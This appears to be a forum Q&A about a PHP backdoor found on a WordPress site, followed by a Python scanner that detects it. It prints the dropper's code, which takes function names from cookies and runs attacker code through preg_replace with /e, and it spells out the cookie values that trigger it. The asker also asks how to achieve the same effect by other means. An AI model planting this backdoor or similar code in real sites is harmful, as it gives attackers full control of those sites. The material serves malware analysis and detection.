
Execute PHP code from cookie

I've found some interesting code:

class PluginJoomla {
    public function __construct() {
        $jq = @$_COOKIE['ContentJQ3'];
        if ($jq) {
            $option = $jq(@$_COOKIE['ContentJQ2']);
            $au=$jq(@$_COOKIE['ContentJQ1']);
            $option("/438/e",$au,438); die();
        }
        else
            phpinfo();die;
    }
}
$content = new PluginJoomla;

It was part of a WordPress website, so ignore the class name. As you can see, the $jq variable gets its value from a cookie. Later it seems to be treated like a function:

$jq(@$_COOKIE['ContentJQ2']);

As you can see here, it is quite a basic PHP thing using variable functions ( https://php.net/manual/en/functions.variable-functions.php ).

Later the $jq variable function returns a function for the $option variable and a string for the $au variable:

$option = $jq(@$_COOKIE['ContentJQ2']);
$au=$jq(@$_COOKIE['ContentJQ1']);
$option("/438/e",$au,438);

So I have a question: is it possible to do the same, but executing PHP code from a cookie (considering not only the exec() function, but also including such a file with require() or using ob_start() and ob_get_clean())?

Also, what do you think about the code itself? Is it some kind of virus or malware?

It is most definitely a malicious script. Let me guess, you found it in /wp-content/uploads/gravity_forms/... ? That's where I found it at a dozen sites where my customers did not update their Gravity Forms installation. (Luckily /wp-content/uploads/*.php is blocked at my servers.)

"$option("/438/e",$au,438);" means execute $au when $option is preg_replace, because of the /e flag.

With $_COOKIE['ContentJQ3']="base64_decode", $_COOKIE['ContentJQ1']=base64("preg_replace") and $_COOKIE['ContentJQ2']=base64("arbitrary_php_code();"), this in the end executes any PHP code the hacker likes. It can then be used to download ANY file from your filesystem (that PHP can access; remember open_basedir), or do anything you like with your database.

If you find this file on your filesystem, please check your access log to see if you're hacked. If you can't prove you're not, please consider your website compromised.
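A detection-side illustration of the two traits described in this answer (a callee resolved from request data, and a regex literal carrying the /e modifier), as an added example that is not part of the original post. The scanner, its heuristics and the two sample files are constructed here; the malicious sample is the dropper quoted in the question.

```python
import re

# Constructed sample: the dropper quoted in the question, verbatim.
MALICIOUS_SAMPLE = r'''<?php
class PluginJoomla {
    public function __construct() {
        $jq = @$_COOKIE['ContentJQ3'];
        if ($jq) {
            $option = $jq(@$_COOKIE['ContentJQ2']);
            $au=$jq(@$_COOKIE['ContentJQ1']);
            $option("/438/e",$au,438); die();
        }
        else
            phpinfo();die;
    }
}
$content = new PluginJoomla;
'''

# Constructed benign file: reads a cookie but never calls it, and uses no /e.
BENIGN_SAMPLE = r'''<?php
$theme = @$_COOKIE['theme'];
echo htmlspecialchars(preg_replace("/[^a-z]/", "", $theme));
'''

SUPERGLOBAL = re.compile(r'\$_(?:COOKIE|GET|POST|REQUEST)\s*\[')
ASSIGN = re.compile(r'\$(\w+)\s*=(?!=)\s*(.+)')      # $lhs = rhs
VAR_REF = re.compile(r'\$(\w+)')                     # any $name on the right-hand side
VAR_CALL = re.compile(r'\$(\w+)\s*\(')               # $name(...): a variable function call
REGEX_E = re.compile(r'''["'](/[^"']*/[a-zA-Z]*e[a-zA-Z]*)["']''')  # "/.../e" literal

def scan_php(source):
    """Heuristic, line-based taint scan. Returns [(line_no, reason)] for
    variable-function calls whose callee derives from request data and for
    regex literals that carry the (removed since PHP 7) /e eval modifier."""
    tainted = set()
    findings = []
    for n, line in enumerate(source.splitlines(), 1):
        m = ASSIGN.search(line)
        if m:
            lhs, rhs = m.group(1), m.group(2)
            # Taint propagates: direct superglobal read, or any tainted var on the RHS.
            if SUPERGLOBAL.search(rhs) or set(VAR_REF.findall(rhs)) & tainted:
                tainted.add(lhs)
        for c in VAR_CALL.finditer(line):
            if c.group(1) in tainted:
                findings.append((n, f"${c.group(1)}() resolved from request data"))
        for r in REGEX_E.finditer(line):
            findings.append((n, f"regex {r.group(1)} carries the /e (eval) modifier"))
    return findings
```

Run against the dropper it flags the three cookie-derived calls plus the /e pattern; a file that merely reads a cookie is not reported, which keeps the heuristic usable over a whole uploads directory.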

It's malicious all right! AVG identifies that as Linux/Roopre and it's bad news because, as @Geeklab has pointed out, it can execute anything in the context of your WP site.
